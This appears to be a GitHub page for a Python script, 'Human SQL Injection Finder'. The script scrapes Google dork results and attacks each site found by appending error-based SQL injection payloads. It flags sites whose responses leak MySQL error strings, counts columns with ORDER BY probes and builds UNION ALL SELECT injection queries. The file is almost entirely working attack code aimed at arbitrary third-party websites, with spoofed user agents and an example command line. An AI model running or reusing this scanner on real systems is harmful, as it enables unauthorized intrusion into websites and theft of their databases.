-
Notifications
You must be signed in to change notification settings - Fork 1
/
main.py
145 lines (111 loc) · 4.88 KB
/
main.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
import argparse
import requests
import time
import bs4
from bs4 import BeautifulSoup
requests.packages.urllib3.disable_warnings()
#__author__ = "Jevil36239"
#__github__ = "github.com/Jevil36239"
#__Finished__ = "12 - Mei - 2023"
#__name__ = "Human SQL Injection Finder"
sqli_payload = """)'XOR(ifnull(CAST(MID((IFNULL(CAST(schema_name%20AS%20CHAR),0x20)),1,62) AS BINARY),0x20)=0)OR('"""
def print_banner():
print(r"""
_______ _______ _______
( ____ \|\ /|( ____ \( ____ \
| ( \/| ) ( || ( \/| ( \/
| | | | | || (__ | |
| | ____ | | | || __) | | ____
| | \_ )| | | || ( | | \_ )
| (___) || (___) || (____/\| (___) |/\
(_______)(_______)(_______/(_______)\_/ Human SQL Injection Finder
""")
def gass_eksekusi(dork, limit):
user_agents = [
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0',
]
keywords = [
"on line",
"at line",
"at row",
"mysql_fetch_array",
"mysql_result",
"mysql_num_rows",
"mysql_fetch_row",
"mysql_fetch_assoc",
"mysql_fetch_object",
"mysql_list_processes",
"mysql_list_dbs",
"mysql_list_tables",
"mysql_stats",
"mysql_num_fields",
"mysql_field_flags",
"mysql_field_len",
"mysql_field_type",
"mysql_field_name",
"mysql_unbuffered_query",
"mysql_query",
"mysql_pconnect",
"mysql_connect",
"mysql_select_db"
]
hasil_link = []
headers = {'User-Agent': user_agents[0]}
gangle_sarching = f"http://www.google.co.in/search?q={dork}"
hasil_results = requests.get(gangle_sarching, headers=headers, verify=False)
if hasil_results.status_code == 200:
soup = BeautifulSoup(hasil_results.text, 'html.parser')
a_tags = soup.findAll('a')
for a in a_tags:
try:
link = a['href']
if 'http' in link and not any(keyword in link for keyword in keywords):
hasil_link.append(link)
except KeyError:
pass
if limit > 0:
hasil_link = hasil_link[:limit]
print(f'\nFound {len(hasil_link)} | "{dork}"\n')
for i, link in enumerate(hasil_link):
headers = {'User-Agent': user_agents[i % 3]}
sqli_check_normal = link + "'"
sqli_check_inject = link + sqli_payload
try:
http_normal = requests.get(sqli_check_normal, headers=headers, verify=False)
http_inject = requests.get(sqli_check_inject, headers=headers, verify=False)
if http_inject.status_code >= 400 or len(http_normal.content) <= len(http_inject.content):
continue
soup = BeautifulSoup(http_inject.text, 'html.parser')
if any(keyword in soup.text for keyword in keywords):
print(f"FOUND VULN | {link}")
nomor_coloums = 1
while True:
payload = f"' ORDER BY {nomor_coloums}--+"
inject_test = link + payload
http_inject = requests.get(inject_test, headers=headers, verify=False)
if http_inject.status_code < 400 and len(http_normal.content) > len(http_inject.content):
break
nomor_coloums += 1
payload = "'+UNION+ALL+SELECT+" + ','.join([str(i) for i in range(1, nomor_coloums)]) + "--+-"
inject_test = link + payload
http_inject = requests.get(inject_test, headers=headers, verify=False)
print(f"QUERY | {inject_test}\n")
else:
print(f"NOT VULN | {link}")
except requests.exceptions.SSLError:
continue
time.sleep(2)
def main():
print_banner()
parser = argparse.ArgumentParser(description='Find SQL injection vulnerabilities using Google dorks')
parser.add_argument('dorks', type=str, nargs='+', help='List of Google dorks to run')
parser.add_argument('--limit', type=int, default=0, help='Limit on the number of websites to check for each dork (default is to check all)')
args = parser.parse_args()
for dork in args.dorks:
gass_eksekusi(dork, args.limit)
if __name__ == '__main__':
main()
# example usage: python sql_injection_finder.py "inlink:index.php?id=" "inlink:gallery.php?id=" --limit 5
# payload = f"' UNION ALL SELECT {','.join(['NULL']*nomor_coloums)}#"